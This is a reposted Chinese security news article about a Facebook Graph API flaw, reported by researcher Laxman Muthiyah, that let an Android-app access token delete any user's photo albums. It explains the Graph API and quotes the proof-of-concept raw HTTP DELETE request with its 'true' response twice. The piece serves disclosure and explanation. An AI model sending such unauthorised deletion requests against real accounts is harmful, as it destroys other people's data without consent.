转载

Facebook用户相册任意删除漏洞

印度安全研究人员Laxman Muthiyah 在Facebook Graph API上发现一个安全漏洞，攻击者可以利用该漏洞删除任意用户Facebook相册。

FreeBuf科普：什么是Graph API？

Facebook Graph API可以理解为一个可以访问Facebook数据的Web服务。该API提供了对人员，相册，事件等等Facebook对象以及这些对象之间诸如朋友，标签，分享内容等等连接之间的访问。

当输入一个URL后，会返回一个Json对象。Graph API是开发人员读写用户数据的主要方式。目前所有的Facebook应用程序使用的都是Graph API。

漏洞描述

理论上来说facebook Graph API需要访问令牌（access token）才能访问或者修改数据，但是研究人员却可利用移动版Facebook生成的访问令牌删除其他Facebook用户相册。

Facebook用户相册任意删除漏洞

对于攻击者来说删除受害者Facebook账户下的相册非常简单，只需要发送一个基于HTTP的Graph API请求即可完成任意删除操作。

请求： - DELETE /518171421550249 HTTP/1.1 Host : graph.facebook.com Content-Length: 245 access_token=<Facebook_for_Android_Access_Token> 响应：-true Album(518171421550249) got deleted :D so whatsthe next step? Took victim's album id and tried to delete it. I was verycurious to see the result.  请求： - DELETE /518171421550249 HTTP/1.1 Host : graph.facebook.com Content-Length: 245 access_token=<Facebook_for_Android_Access_Token> 结果：-true OMG :D the album got deleted! So i got the key to delete all of your Facebookphotos :P lol :D "